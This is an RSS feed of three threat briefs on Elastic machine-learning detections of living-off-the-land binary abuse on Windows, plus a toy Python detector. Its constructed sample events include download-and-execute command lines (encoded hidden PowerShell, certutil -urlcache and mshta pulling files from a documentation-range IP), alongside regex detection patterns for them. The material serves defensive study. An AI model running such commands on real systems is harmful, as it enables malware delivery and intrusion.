<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>LOLbins — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/lolbins/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata — refreshed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Tue, 23 Jan 2024 12:00:00 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/lolbins/feed.xml" rel="self" type="application/rss+xml"/><item><title>Unusual Process Spawned by a Parent Process via Machine Learning</title><link>https://feed.craftedsignal.io/briefs/2024-01-unusual-process-spawn/</link><pubDate>Tue, 23 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-unusual-process-spawn/</guid><description>A machine learning job detected a suspicious Windows process, predicted malicious by the ProblemChild model and flagged as an unusual child process name for its parent, potentially indicating LOLbins usage and evading traditional detection.</description><content:encoded><![CDATA[<p>This alert originates from the Elastic machine learning job <code>problem_child_rare_process_by_parent_ea</code>, which ships with the Living off the Land (LotL) Attack Detection integration to detect LotL attacks on Windows systems. Two models work together: the supervised &ldquo;ProblemChild&rdquo; model assigns each process event a probability of being malicious, and an unsupervised anomaly detection job then flags, among the events predicted malicious, child process names that are statistically rare for their parent process. The goal is to surface abuse of legitimate system binaries (LOLbins), which evades signature-based detection because the binaries themselves are trusted. The alert relies on Windows process events collected by Elastic Defend or Winlogbeat with the LotL Attack Detection integration installed. This kind of detection matters because attackers increasingly rely on tools already present on the host to blend in with normal activity and avoid raising suspicion.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access via unspecified means (e.g., phishing, compromised credentials).</li>
<li>Attacker leverages a legitimate system binary (LOLbin) such as <code>powershell.exe</code> or <code>cmd.exe</code>.</li>
<li>The LOLbin is used to execute a malicious payload or script.</li>
<li>The malicious process is spawned as a child process of the LOLbin.</li>
<li>Elastic&rsquo;s machine learning model identifies the child process as rare and potentially malicious based on its parent-child relationship and other features.</li>
<li>The rare process executes malicious commands, possibly downloading further payloads.</li>
<li>The attacker achieves their objective, such as data exfiltration or lateral movement.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful attack utilizing LOLbins can lead to significant compromise, including data theft, system disruption, and further propagation within the network. The reliance on trusted system binaries makes these attacks difficult to detect with traditional methods, potentially allowing attackers to operate undetected for extended periods. The impact is directly correlated to the privileges of the initial compromised account and the effectiveness of lateral movement techniques employed by the attacker.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Ensure that the Living off the Land (LotL) Attack Detection integration is installed and configured correctly, along with either Elastic Defend or Winlogbeat, as described in the rule&rsquo;s <code>setup</code> section.</li>
<li>Review the parent and child process names identified in the alert to determine if they are legitimate applications or associated with LOLbins, as detailed in the investigation guide within the rule&rsquo;s <code>note</code> section.</li>
<li>Investigate the command-line arguments used by the suspicious process for potentially malicious commands or scripts as described in the rule <code>note</code> section.</li>
<li>Tune the rule&rsquo;s <code>anomaly_threshold</code> parameter (the minimum ML anomaly score that produces an alert) based on your environment&rsquo;s baseline activity to reduce false positives, as described in the rule documentation.</li>
<li>Implement exceptions for legitimate administrative tools and software updates to reduce false positives, as mentioned in the rule&rsquo;s <code>note</code> section.</li>
</ul>
]]></content:encoded><category domain="severity">low</category><category domain="type">advisory</category><category>defense-evasion</category><category>lolbins</category><category>windows</category><category>machine-learning</category></item><item><title>Suspicious Windows Process Cluster Detection via Machine Learning</title><link>https://feed.craftedsignal.io/briefs/2024-01-suspicious-windows-process/</link><pubDate>Wed, 03 Jan 2024 18:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-suspicious-windows-process/</guid><description>A machine learning job combination has identified a host with one or more suspicious Windows processes that exhibit unusually high malicious probability scores, potentially indicating masquerading and defense evasion tactics.</description><content:encoded><![CDATA[<p>This detection identifies hosts whose Windows process activity carries unusually high malicious probability scores. Two ML models are involved: the supervised ProblemChild model scores each process event with a probability of being malicious, and an unsupervised anomaly detection job (<code>problem_child_high_sum_by_host_ea</code>) aggregates those scores per host and flags hosts whose total is anomalously high. A cluster of high-scoring processes on one host is a signal for defense evasion tactics such as masquerading or abuse of Living Off The Land Binaries (LOLbins) that individual signature-based rules would miss. The rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by Elastic Defend or Winlogbeat. It was last updated on 2026/04/01 and requires Elastic Stack version 9.4.0 or later.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Initial Access: The attacker gains initial access to the Windows host through various methods, such as exploiting vulnerabilities or using compromised credentials (not detailed in source).</li>
<li>Execution: The attacker executes a LOLBin (e.g., PowerShell, cmd.exe, mshta.exe) on the compromised host.</li>
<li>Masquerading: The attacker disguises the activity, for example by renaming a malicious binary after a legitimate Windows process or placing it in a legitimate system folder so it blends in with the LOLBins around it.</li>
<li>Defense Evasion: The attacker utilizes the LOLBin with specific command-line arguments designed to evade detection by traditional signature-based security solutions.</li>
<li>Privilege Escalation (Optional): The attacker may attempt to escalate privileges using further LOLBins or other techniques.</li>
<li>Lateral Movement (Optional): The attacker may use the compromised host to move laterally to other systems within the network.</li>
<li>Command and Control (Optional): The attacker may establish command and control (C2) communication with an external server to receive further instructions.</li>
<li>Impact: The attacker achieves their objective, such as data exfiltration, ransomware deployment, or system disruption.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful attack can lead to data breaches, financial loss and reputational damage, and the compromised host can serve as a foothold for lateral movement and exfiltration. The rule carries a low severity because it is intended as a supplemental signal that corroborates other detections rather than a standalone alert. No information is available on the number of victims or the sectors targeted.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Ensure the Living off the Land (LotL) Attack Detection integration is installed and configured correctly, along with either Elastic Defend or Winlogbeat, to collect Windows process events as outlined in the <a href="https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html">setup instructions</a>.</li>
<li>Review the host name associated with the suspicious process cluster to determine if it is a critical asset or has a history of similar alerts as suggested in the investigation guide.</li>
<li>Examine the specific processes flagged by the ProblemChild supervised ML model to identify any known LOLbins or unusual command-line arguments that may indicate masquerading, per the investigation guide.</li>
<li>Implement application whitelisting to prevent unauthorized or suspicious processes from executing in the future, as advised in the remediation steps.</li>
<li>Tune the rule&rsquo;s anomaly threshold for the <code>problem_child_high_sum_by_host_ea</code> job to reduce false positives based on your environment&rsquo;s baseline activity, and add exceptions for legitimate administrative tooling and software updaters that routinely run scripting hosts, since their scores otherwise inflate the per-host sum.</li>
</ul>
]]></content:encoded><category domain="severity">low</category><category domain="type">advisory</category><category>defense-evasion</category><category>masquerading</category><category>LOLbins</category><category>windows</category></item><item><title>Unusual Process Spawned by a User Detected by Machine Learning</title><link>https://feed.craftedsignal.io/briefs/2024-01-rare-process-user/</link><pubDate>Wed, 03 Jan 2024 10:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-rare-process-user/</guid><description>A machine learning job detected a suspicious Windows process, predicted to be malicious by the ProblemChild supervised ML model and found to be unusual within the user's context, potentially indicating defense evasion techniques like masquerading or the use of LOLbins.</description><content:encoded><![CDATA[<p>This machine learning (ML) rule flags unusual process execution on a Windows endpoint. It leverages two ML models shipped with the Living off the Land (LotL) Attack Detection integration: the supervised ProblemChild model, which predicts whether a process is malicious, and an unsupervised anomaly detection job that identifies, among the predicted-malicious processes, those that are rare for the user running them. The rule targets defense evasion tactics, specifically Living-off-the-Land Binaries (LOLbins) and masquerading, which signature-based methods struggle to detect. It consumes Windows process events from Elastic Defend or Winlogbeat and requires the LotL Attack Detection integration assets to be installed. This rule was last updated April 1, 2026 and requires Elastic Stack version 9.4.0 or higher.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Initial Access: The attacker gains initial access through an existing user account.</li>
<li>Execution: The attacker executes a standard Windows process (e.g., cmd.exe, powershell.exe).</li>
<li>Defense Evasion: The attacker leverages LOLbins to perform malicious actions, blending in with legitimate system activity.</li>
<li>Masquerading: The attacker renames or moves malicious tools to mimic legitimate system files.</li>
<li>Privilege Escalation (Optional): The attacker attempts to escalate privileges using the compromised process.</li>
<li>Lateral Movement (Optional): The attacker uses the compromised process to move laterally to other systems.</li>
<li>Command and Control (Optional): The process establishes a connection to a command and control server for further instructions.</li>
<li>Impact: The attacker achieves their objective, such as data exfiltration, system compromise, or persistence.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful attack using these techniques can lead to full system compromise, data theft or the installation of persistent backdoors, and lateral movement extends the impact to other systems on the network. The use of LOLbins makes detection difficult, potentially allowing attackers to operate undetected for extended periods. The severity is rated &ldquo;low&rdquo;, but an unanswered alert can still mean an attacker who has already moved laterally and established persistence.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Ensure the Living off the Land (LotL) Attack Detection integration is installed and properly configured, as detailed in the rule setup (Elastic Defend or Winlogbeat).</li>
<li>Investigate alerts generated by the &ldquo;Unusual Process Spawned by a User&rdquo; rule (rule_id: 40155ee4-1e6a-4e4d-a63b-e8ba16980cfb) to determine the legitimacy of the flagged process.</li>
<li>Tune the anomaly threshold (<code>anomaly_threshold: 75</code>) based on your environment to reduce false positives, as mentioned in the rule parameters.</li>
<li>Review the &ldquo;False positive analysis&rdquo; section in the rule&rsquo;s note for guidance on identifying and excluding legitimate processes.</li>
<li>Deploy the Sigma rule that accompanies this brief (not reproduced here) to detect unusual command-line arguments associated with LOLBins.</li>
</ul>
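<p>The three briefs above describe one two-stage design: a supervised ProblemChild score per process event, followed by an anomaly job that keys on that score by parent process, by host, or by user. The Python below is an added example written for this page, not Elastic&rsquo;s ML job or model code. <code>score_command_line()</code> is a hypothetical keyword heuristic standing in for the real ProblemChild classifier, and the hosts, users, events, thresholds and the <code>updater.exe</code> exception are all constructed for illustration. It shows why the rarity stage matters: a patching service that legitimately runs a PowerShell download cradle scores as &ldquo;predicted malicious&rdquo; but is not rare for its parent or user, so only the Word-spawned encoded PowerShell and the certutil/mshta downloaders survive, while the host-sum job keeps counting the patcher&rsquo;s events until an exception is added.</p>

```python
"""Toy re-creation of the ProblemChild-style detections described in these briefs.

Added example, not Elastic's ML job or model code. The supervised ProblemChild
classifier is replaced by score_command_line(), a hypothetical keyword
heuristic; sample events, field names and thresholds are constructed here.
"""
import re
from collections import Counter, defaultdict


def ev(host, user, parent, name, cmd):
    """Minimal process event; keys loosely follow ECS host.name, user.name,
    process.parent.name, process.name and process.command_line."""
    return {"host": host, "user": user, "parent": parent, "name": name, "cmd": cmd}


# --- Constructed sample telemetry (not real data) -----------------------------
EVENTS = []
for _ in range(10):  # routine desktop activity gives the rarity stage a baseline
    EVENTS += [
        ev("ws01", "alice", "explorer.exe", "outlook.exe", "outlook.exe"),
        ev("ws01", "alice", "explorer.exe", "winword.exe", "winword.exe /n"),
        ev("ws01", "alice", "winword.exe", "splwow64.exe", "splwow64.exe 12288"),
        ev("ws02", "bob", "explorer.exe", "chrome.exe", "chrome.exe"),
        ev("ws02", "bob", "cmd.exe", "ipconfig.exe", "ipconfig /all"),
    ]
# A (hypothetical) patching service that legitimately runs a PowerShell download cradle.
EVENTS += [ev("ws02", "svc_patch", "updater.exe", "powershell.exe",
              'powershell.exe -nop -c "Invoke-WebRequest https://updates.example.invalid/x"')] * 4
# Suspicious activity: Word spawning hidden, encoded PowerShell; certutil and
# mshta used as downloaders from cmd.exe (203.0.113.0/24 is a documentation range).
EVENTS += [
    ev("ws01", "alice", "winword.exe", "powershell.exe",
       "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ev("ws02", "bob", "cmd.exe", "certutil.exe",
       "certutil.exe -urlcache -split -f http://203.0.113.9/a.bin C:\\Users\\Public\\a.bin"),
    ev("ws02", "bob", "cmd.exe", "mshta.exe", "mshta.exe http://203.0.113.9/p.hta"),
]

# --- Stage 1: hypothetical stand-in for the supervised ProblemChild score ------
INDICATORS = [
    (re.compile(r"-enc(odedcommand)?\b", re.I), 0.4),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), 0.2),
    (re.compile(r"\b(iex|invoke-expression|downloadstring|invoke-webrequest)\b", re.I), 0.3),
    (re.compile(r"-urlcache\b", re.I), 0.4),
    (re.compile(r"\bmshta(\.exe)?\s+https?://", re.I), 0.5),
    (re.compile(r"https?://", re.I), 0.2),
]
MALICIOUS = 0.5  # invented cut-off: score >= MALICIOUS plays the role of prediction == 1


def score_command_line(cmd: str) -> float:
    """Return a 0..1 'malicious probability' from command-line indicators."""
    return min(1.0, sum(w for rx, w in INDICATORS if rx.search(cmd)))


def predicted_malicious(events):
    """Events the stand-in classifier would label malicious, with their score."""
    scored = [dict(e, score=score_command_line(e["cmd"])) for e in events]
    return [e for e in scored if e["score"] >= MALICIOUS]


# --- Stage 2: unsupervised-style anomaly jobs over the scored events -----------
def rare_by(all_events, candidates, key, partition, max_share=0.1):
    """Toy 'rare by <key> partitioned by <partition>': keep candidates whose
    (partition, key) pair makes up at most max_share of that partition's events
    in the full baseline, e.g. a child name rarely seen under that parent."""
    totals = Counter(e[partition] for e in all_events)
    pairs = Counter((e[partition], e[key]) for e in all_events)
    return [c for c in candidates
            if pairs[(c[partition], c[key])] / totals[c[partition]] <= max_share]


def high_sum_by_host(all_events, threshold=1.0, exclude=lambda e: False):
    """Toy 'high_sum(score) by host': sum the stand-in score per host, skipping
    events matched by an exception predicate, and return hosts over threshold."""
    sums = defaultdict(float)
    for e in all_events:
        if not exclude(e):
            sums[e["host"]] += score_command_line(e["cmd"])
    return {h: round(s, 2) for h, s in sums.items() if s > threshold}


def run(events=EVENTS):
    cands = predicted_malicious(events)
    return {
        "rare_process_by_parent": [(c["parent"], c["name"])
                                   for c in rare_by(events, cands, "name", "parent")],
        "rare_process_by_user": [(c["user"], c["name"])
                                 for c in rare_by(events, cands, "name", "user")],
        "high_sum_by_host": high_sum_by_host(events),
        # Exception for the patching service, as the briefs recommend for known tooling.
        "high_sum_by_host_excepted": high_sum_by_host(
            events, exclude=lambda e: e["parent"] == "updater.exe"),
    }


if __name__ == "__main__":
    for job, hits in run().items():
        print(f"{job}: {hits}")
```

<p>Running the script prints one line per toy job. The two rarity jobs return only the three constructed attacker events, because <code>svc_patch</code>&rsquo;s cradle is the only thing its parent and its user ever run; the host-sum job flags <code>ws02</code> in both variants, but its total drops from 3.3 to 1.3 once the updater exception is applied, which is the kind of tuning the recommendations above describe. In a real deployment the score comes from the ProblemChild model and the rarity and sum logic from the Elastic ML jobs; only the layering is reproduced here.</p>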
]]></content:encoded><category domain="severity">low</category><category domain="type">advisory</category><category>endpoint</category><category>windows</category><category>defense evasion</category><category>machine learning</category><category>lolbins</category></item></channel></rss>